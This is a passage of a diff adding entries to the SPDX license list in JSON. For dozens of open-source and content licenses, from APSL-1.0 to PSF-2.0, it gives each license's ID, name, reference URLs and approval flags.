+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d4bc786f34b50aa301be6f5600f58a980070f481e"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/APSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APSL-1.0.json",
+ "referenceNumber": 311,
+ "name": "Apple Public Source License 1.0",
+ "licenseId": "APSL-1.0",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Apple_Public_Source_License_1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-LBNL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-LBNL.json",
+ "referenceNumber": 312,
+ "name": "Lawrence Berkeley National Labs BSD variant license",
+ "licenseId": "BSD-3-Clause-LBNL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/LBNLBSD"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GLWTPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GLWTPL.json",
+ "referenceNumber": 313,
+ "name": "Good Luck With That Public License",
+ "licenseId": "GLWTPL",
+ "seeAlso": [
+ "https://github.com/me-shaon/GLWTPL/commit/da5f6bc734095efbacb442c0b31e33a65b9d6e85"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-3.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-3.0-only.json",
+ "referenceNumber": 314,
+ "name": "GNU Lesser General Public License v3.0 only",
+ "licenseId": "LGPL-3.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+ "https://opensource.org/licenses/LGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGC-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGC-1.0.json",
+ "referenceNumber": 315,
+ "name": "OGC Software License, Version 1.0",
+ "licenseId": "OGC-1.0",
+ "seeAlso": [
+ "https://www.ogc.org/ogc/software/1.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Dotseqn.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Dotseqn.json",
+ "referenceNumber": 316,
+ "name": "Dotseqn License",
+ "licenseId": "Dotseqn",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Dotseqn"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MakeIndex.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MakeIndex.json",
+ "referenceNumber": 317,
+ "name": "MakeIndex License",
+ "licenseId": "MakeIndex",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MakeIndex"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0-only.json",
+ "referenceNumber": 318,
+ "name": "GNU General Public License v3.0 only",
+ "licenseId": "GPL-3.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+ "https://opensource.org/licenses/GPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License-2014.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License-2014.json",
+ "referenceNumber": 319,
+ "name": "BSD 3-Clause No Nuclear License 2014",
+ "licenseId": "BSD-3-Clause-No-Nuclear-License-2014",
+ "seeAlso": [
+ "https://java.net/projects/javaeetutorial/pages/BerkeleyLicense"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-1.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-1.0-only.json",
+ "referenceNumber": 320,
+ "name": "GNU General Public License v1.0 only",
+ "licenseId": "GPL-1.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/IJG.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/IJG.json",
+ "referenceNumber": 321,
+ "name": "Independent JPEG Group License",
+ "licenseId": "IJG",
+ "seeAlso": [
+ "http://dev.w3.org/cvsweb/Amaya/libjpeg/Attic/README?rev\u003d1.2"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-1.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-1.0-or-later.json",
+ "referenceNumber": 322,
+ "name": "Affero General Public License v1.0 or later",
+ "licenseId": "AGPL-1.0-or-later",
+ "seeAlso": [
+ "http://www.affero.org/oagpl.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.1-no-RFN.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.1-no-RFN.json",
+ "referenceNumber": 323,
+ "name": "SIL Open Font License 1.1 with no Reserved Font Name",
+ "licenseId": "OFL-1.1-no-RFN",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
+ "https://opensource.org/licenses/OFL-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSL-1.0.json",
+ "referenceNumber": 324,
+ "name": "Boost Software License 1.0",
+ "licenseId": "BSL-1.0",
+ "seeAlso": [
+ "http://www.boost.org/LICENSE_1_0.txt",
+ "https://opensource.org/licenses/BSL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Libpng.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Libpng.json",
+ "referenceNumber": 325,
+ "name": "libpng License",
+ "licenseId": "Libpng",
+ "seeAlso": [
+ "http://www.libpng.org/pub/png/src/libpng-LICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-3.0.json",
+ "referenceNumber": 326,
+ "name": "Creative Commons Attribution Non Commercial 3.0 Unported",
+ "licenseId": "CC-BY-NC-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-2.0.json",
+ "referenceNumber": 327,
+ "name": "Creative Commons Attribution Non Commercial 2.0 Generic",
+ "licenseId": "CC-BY-NC-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Unlicense.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Unlicense.json",
+ "referenceNumber": 328,
+ "name": "The Unlicense",
+ "licenseId": "Unlicense",
+ "seeAlso": [
+ "https://unlicense.org/"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPL-1.0.json",
+ "referenceNumber": 329,
+ "name": "Lucent Public License Version 1.0",
+ "licenseId": "LPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/LPL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/bzip2-1.0.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/bzip2-1.0.5.json",
+ "referenceNumber": 330,
+ "name": "bzip2 and libbzip2 License v1.0.5",
+ "licenseId": "bzip2-1.0.5",
+ "seeAlso": [
+ "https://sourceware.org/bzip2/1.0.5/bzip2-manual-1.0.5.html",
+ "http://bzip.org/1.0.5/bzip2-manual-1.0.5.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Entessa.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Entessa.json",
+ "referenceNumber": 331,
+ "name": "Entessa Public License v1.0",
+ "licenseId": "Entessa",
+ "seeAlso": [
+ "https://opensource.org/licenses/Entessa"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-2-Clause-Patent.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-Patent.json",
+ "referenceNumber": 332,
+ "name": "BSD-2-Clause Plus Patent License",
+ "licenseId": "BSD-2-Clause-Patent",
+ "seeAlso": [
+ "https://opensource.org/licenses/BSDplusPatent"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ECL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ECL-2.0.json",
+ "referenceNumber": 333,
+ "name": "Educational Community License v2.0",
+ "licenseId": "ECL-2.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/ECL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Crossword.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Crossword.json",
+ "referenceNumber": 334,
+ "name": "Crossword License",
+ "licenseId": "Crossword",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Crossword"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-1.0.json",
+ "referenceNumber": 335,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 1.0 Generic",
+ "licenseId": "CC-BY-NC-ND-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd-nc/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OCLC-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OCLC-2.0.json",
+ "referenceNumber": 336,
+ "name": "OCLC Research Public License 2.0",
+ "licenseId": "OCLC-2.0",
+ "seeAlso": [
+ "http://www.oclc.org/research/activities/software/license/v2final.htm",
+ "https://opensource.org/licenses/OCLC-2.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-1.1.json",
+ "referenceNumber": 337,
+ "name": "CeCILL Free Software License Agreement v1.1",
+ "licenseId": "CECILL-1.1",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL_V1.1-US.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-2.1.json",
+ "referenceNumber": 338,
+ "name": "CeCILL Free Software License Agreement v2.1",
+ "licenseId": "CECILL-2.1",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL_V2.1-en.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGDL-Taiwan-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGDL-Taiwan-1.0.json",
+ "referenceNumber": 339,
+ "name": "Taiwan Open Government Data License, version 1.0",
+ "licenseId": "OGDL-Taiwan-1.0",
+ "seeAlso": [
+ "https://data.gov.tw/license"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Abstyles.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Abstyles.json",
+ "referenceNumber": 340,
+ "name": "Abstyles License",
+ "licenseId": "Abstyles",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Abstyles"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/libselinux-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/libselinux-1.0.json",
+ "referenceNumber": 341,
+ "name": "libselinux public domain notice",
+ "licenseId": "libselinux-1.0",
+ "seeAlso": [
+ "https://github.com/SELinuxProject/selinux/blob/master/libselinux/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ANTLR-PD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ANTLR-PD.json",
+ "referenceNumber": 342,
+ "name": "ANTLR Software Rights Notice",
+ "licenseId": "ANTLR-PD",
+ "seeAlso": [
+ "http://www.antlr2.org/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-or-later.json",
+ "referenceNumber": 343,
+ "name": "GNU General Public License v2.0 or later",
+ "licenseId": "GPL-2.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+ "https://opensource.org/licenses/GPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/IPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/IPL-1.0.json",
+ "referenceNumber": 344,
+ "name": "IBM Public License v1.0",
+ "licenseId": "IPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/IPL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-enna.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-enna.json",
+ "referenceNumber": 345,
+ "name": "enna License",
+ "licenseId": "MIT-enna",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MIT#enna"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CPOL-1.02.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CPOL-1.02.json",
+ "referenceNumber": 346,
+ "name": "Code Project Open License 1.02",
+ "licenseId": "CPOL-1.02",
+ "seeAlso": [
+ "http://www.codeproject.com/info/cpol10.aspx"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-3.0-AT.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0-AT.json",
+ "referenceNumber": 347,
+ "name": "Creative Commons Attribution Share Alike 3.0 Austria",
+ "licenseId": "CC-BY-SA-3.0-AT",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/3.0/at/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0-with-GCC-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0-with-GCC-exception.json",
+ "referenceNumber": 348,
+ "name": "GNU General Public License v3.0 w/GCC Runtime Library exception",
+ "licenseId": "GPL-3.0-with-GCC-exception",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gcc-exception-3.1.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-1-Clause.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-1-Clause.json",
+ "referenceNumber": 349,
+ "name": "BSD 1-Clause License",
+ "licenseId": "BSD-1-Clause",
+ "seeAlso": [
+ "https://svnweb.freebsd.org/base/head/include/ifaddrs.h?revision\u003d326823"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NTP-0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NTP-0.json",
+ "referenceNumber": 350,
+ "name": "NTP No Attribution",
+ "licenseId": "NTP-0",
+ "seeAlso": [
+ "https://github.com/tytso/e2fsprogs/blob/master/lib/et/et_name.c"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SugarCRM-1.1.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SugarCRM-1.1.3.json",
+ "referenceNumber": 351,
+ "name": "SugarCRM Public License v1.1.3",
+ "licenseId": "SugarCRM-1.1.3",
+ "seeAlso": [
+ "http://www.sugarcrm.com/crm/SPL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT.json",
+ "referenceNumber": 352,
+ "name": "MIT License",
+ "licenseId": "MIT",
+ "seeAlso": [
+ "https://opensource.org/licenses/MIT"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.1-RFN.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.1-RFN.json",
+ "referenceNumber": 353,
+ "name": "SIL Open Font License 1.1 with Reserved Font Name",
+ "licenseId": "OFL-1.1-RFN",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
+ "https://opensource.org/licenses/OFL-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Watcom-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Watcom-1.0.json",
+ "referenceNumber": 354,
+ "name": "Sybase Open Watcom Public License 1.0",
+ "licenseId": "Watcom-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/Watcom-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-FR.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-FR.json",
+ "referenceNumber": 355,
+ "name": "Creative Commons Attribution-NonCommercial-ShareAlike 2.0 France",
+ "licenseId": "CC-BY-NC-SA-2.0-FR",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/2.0/fr/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ODbL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ODbL-1.0.json",
+ "referenceNumber": 356,
+ "name": "Open Data Commons Open Database License v1.0",
+ "licenseId": "ODbL-1.0",
+ "seeAlso": [
+ "http://www.opendatacommons.org/licenses/odbl/1.0/",
+ "https://opendatacommons.org/licenses/odbl/1-0/"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/FSFULLR.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FSFULLR.json",
+ "referenceNumber": 357,
+ "name": "FSF Unlimited License (with License Retention)",
+ "licenseId": "FSFULLR",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/FSF_Unlimited_License#License_Retention_Variant"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-1.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-1.3.json",
+ "referenceNumber": 358,
+ "name": "Open LDAP Public License v1.3",
+ "licenseId": "OLDAP-1.3",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003de5f8117f0ce088d0bd7a8e18ddf37eaa40eb09b1"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SSH-OpenSSH.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SSH-OpenSSH.json",
+ "referenceNumber": 359,
+ "name": "SSH OpenSSH license",
+ "licenseId": "SSH-OpenSSH",
+ "seeAlso": [
+ "https://github.com/openssh/openssh-portable/blob/1b11ea7c58cd5c59838b5fa574cd456d6047b2d4/LICENCE#L10"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-2-Clause.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause.json",
+ "referenceNumber": 360,
+ "name": "BSD 2-Clause \"Simplified\" License",
+ "licenseId": "BSD-2-Clause",
+ "seeAlso": [
+ "https://opensource.org/licenses/BSD-2-Clause"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/HPND.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/HPND.json",
+ "referenceNumber": 361,
+ "name": "Historical Permission Notice and Disclaimer",
+ "licenseId": "HPND",
+ "seeAlso": [
+ "https://opensource.org/licenses/HPND"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Zimbra-1.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Zimbra-1.3.json",
+ "referenceNumber": 362,
+ "name": "Zimbra Public License v1.3",
+ "licenseId": "Zimbra-1.3",
+ "seeAlso": [
+ "http://web.archive.org/web/20100302225219/http://www.zimbra.com/license/zimbra-public-license-1-3.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Borceux.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Borceux.json",
+ "referenceNumber": 363,
+ "name": "Borceux license",
+ "licenseId": "Borceux",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Borceux"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-1.1.json",
+ "referenceNumber": 364,
+ "name": "Open LDAP Public License v1.1",
+ "licenseId": "OLDAP-1.1",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d806557a5ad59804ef3a44d5abfbe91d706b0791f"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.0.json",
+ "referenceNumber": 365,
+ "name": "SIL Open Font License 1.0",
+ "licenseId": "OFL-1.0",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NASA-1.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NASA-1.3.json",
+ "referenceNumber": 366,
+ "name": "NASA Open Source Agreement 1.3",
+ "licenseId": "NASA-1.3",
+ "seeAlso": [
+ "http://ti.arc.nasa.gov/opensource/nosa/",
+ "https://opensource.org/licenses/NASA-1.3"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/VOSTROM.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/VOSTROM.json",
+ "referenceNumber": 367,
+ "name": "VOSTROM Public License for Open Source",
+ "licenseId": "VOSTROM",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/VOSTROM"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-0.json",
+ "referenceNumber": 368,
+ "name": "MIT No Attribution",
+ "licenseId": "MIT-0",
+ "seeAlso": [
+ "https://github.com/aws/mit-0",
+ "https://romanrm.net/mit-zero",
+ "https://github.com/awsdocs/aws-cloud9-user-guide/blob/master/LICENSE-SAMPLECODE"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ISC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ISC.json",
+ "referenceNumber": 369,
+ "name": "ISC License",
+ "licenseId": "ISC",
+ "seeAlso": [
+ "https://www.isc.org/licenses/",
+ "https://www.isc.org/downloads/software-support-policy/isc-license/",
+ "https://opensource.org/licenses/ISC"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Unicode-DFS-2016.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Unicode-DFS-2016.json",
+ "referenceNumber": 370,
+ "name": "Unicode License Agreement - Data Files and Software (2016)",
+ "licenseId": "Unicode-DFS-2016",
+ "seeAlso": [
+ "http://www.unicode.org/copyright.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BlueOak-1.0.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BlueOak-1.0.0.json",
+ "referenceNumber": 371,
+ "name": "Blue Oak Model License 1.0.0",
+ "licenseId": "BlueOak-1.0.0",
+ "seeAlso": [
+ "https://blueoakcouncil.org/license/1.0.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LiLiQ-Rplus-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LiLiQ-Rplus-1.1.json",
+ "referenceNumber": 372,
+ "name": "Licence Libre du Québec – Réciprocité forte version 1.1",
+ "licenseId": "LiLiQ-Rplus-1.1",
+ "seeAlso": [
+ "https://www.forge.gouv.qc.ca/participez/licence-logicielle/licence-libre-du-quebec-liliq-en-francais/licence-libre-du-quebec-reciprocite-forte-liliq-r-v1-1/",
+ "http://opensource.org/licenses/LiLiQ-Rplus-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NOSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NOSL.json",
+ "referenceNumber": 373,
+ "name": "Netizen Open Source License",
+ "licenseId": "NOSL",
+ "seeAlso": [
+ "http://bits.netizen.com.au/licenses/NOSL/nosl.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SMLNJ.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SMLNJ.json",
+ "referenceNumber": 374,
+ "name": "Standard ML of New Jersey License",
+ "licenseId": "SMLNJ",
+ "seeAlso": [
+ "https://www.smlnj.org/license.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-3.0+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-3.0+.json",
+ "referenceNumber": 375,
+ "name": "GNU Lesser General Public License v3.0 or later",
+ "licenseId": "LGPL-3.0+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+ "https://opensource.org/licenses/LGPL-3.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CPAL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CPAL-1.0.json",
+ "referenceNumber": 376,
+ "name": "Common Public Attribution License 1.0",
+ "licenseId": "CPAL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/CPAL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/PSF-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PSF-2.0.json",
+ "referenceNumber": 377,
+ "name": "Python Software Foundation License 2.0",
+ "licenseId": "PSF-2.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/Python-2.0"
+ ],
+ "isOsiApproved": false
+ },
